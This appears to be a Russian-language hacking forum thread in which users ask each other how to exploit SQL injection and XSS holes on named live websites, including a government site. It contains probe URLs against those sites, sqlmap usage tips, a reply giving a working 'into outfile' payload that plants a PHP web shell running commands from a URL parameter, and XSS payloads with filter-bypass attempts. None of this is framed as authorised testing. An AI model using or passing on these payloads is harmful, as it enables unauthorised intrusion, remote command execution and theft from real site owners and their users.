ну как. http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=1+--+ - TRUE http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=2+--+ - FALSE А так же http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+Order+by+2+--+ - TRUE новость вылазиет при true. так же при некоторых командах вылазиет белая страничка 2) А тут можно что нибудь сделать? http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr(123,1,1)=1+--+ http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+order+by+1+--+ http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr('a',1,1)='a'
Code: http://www.everynight.co.uk/imageViewer.asp?imageID=11206 and 1=1 В общем... Access, брут tables ничего не нашёл. Что делать дальше?
Есть Blind'овая скуля, проверил права -- ROOT. Нашел phpinfo, оттуда взял путь, нашел врайтабельную папку, вроде как все норм. Кручу sqlmap'ом ибо руками блайнд крутить это маразм. Попробовал залить шелл и наткнулся на не очень приятный момент, sqlmap не спрашивает путь для заливки шелла. Скуля в поле password, а там функция шифрования в md5 дает ошибку с раскрытием путей. Sqlmap берет этот путь и пытается залить шелл по тому пути, а меня не спрашивает. Как указать кастомный путь в таком случае?
Заливайте безо всяких SQLMap. Просто используйте конструкцию union select '<?php ?>' into outfile '/' , независимо от вывода результата. Возможно, придётся поподбирать количество столбцов. Остальных проблем, судя по вашему рассказу (MQ off, FilePriv on, FPD true), нет. Всё должно получиться.
Code: 1 limit 1 into outfile '/path/to/shell.php' lines terminated by "<?php system($_GET[c]);?>"--+ https://rdot.org/forum/showthread.php?t=60
страница изменяется http://www.air.am/en/your-itinerary/15/ => http://www.air.am/en/your-itinerary/15'/
Code: "><img srcset=",,,,,x"onerror="alert(1)"> Чтобы сработала XSS осталось добится, чтобы вставился пробел вмежду тегами img srcset. Символы \ и / заменяются на %20. Подскажите куда можно еще копать?
Вывод <input type="hidden" name="page_location" value="/search/"><img%20srcset=",,,,,x"onerror="alert(1)">"> Что Вы имеете ввиду под вопросом "где сам инъект?". waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега
Code: <input type="hidden" name="page_location" value="/search/"><img%0csrcset=",,,,,x"onerror="alert(1)">"> %0C так и остается в исходном коде, также как и пробел заменяется на %20
Code: GET /search/%22%3E%3Cimg%20srcset%3D%22%2C%2C%2C%2C%2Cx%22onerror%3D%22alert(1)%22%3E HTTP/1.1 Host: ********* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: ********* Cookie: PHPSESSID=p7f3b38uuh1icqqqndscb75a10; Lang=ru; ShopID=37; __utma=244353110.90581892.1436196504.1436227051.1436260016.5; __utmc=244353110; __utmz=244353110.1436196504.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jv_enter_ts_dUv23LxxhD=1436196515709; jv_visits_count_dUv23LxxhD=1; jv_pages_count_dUv23LxxhD=107; jv_gui_state_dUv23LxxhD=WIDGET; jv_cm_dUv23LxxhD=ws; jv_client_id_dUv23LxxhD=242556.2oZiZbl%2Bz3jZ%2Fn3i7hwsPj8u5Hm4%2Byfv2aQVwObJGqY; jv_invitation_time_dUv23LxxhD=1436260532076; jv_close_time_dUv23LxxhD=1436220689308; __utmb=244353110.14.9.1436260532079; _ym_visorc_20996566=w; jv_sess_id_dUv23LxxhD=sbd62ebf98ea95eb5d817667c74a59689; __utmt=1 Connection: keep-alive
Привет всем! Подскажите тут есть скуль? http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+1--+ http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+10--+ Там по моему фильтр на Union select стоит, не могу обойти никак
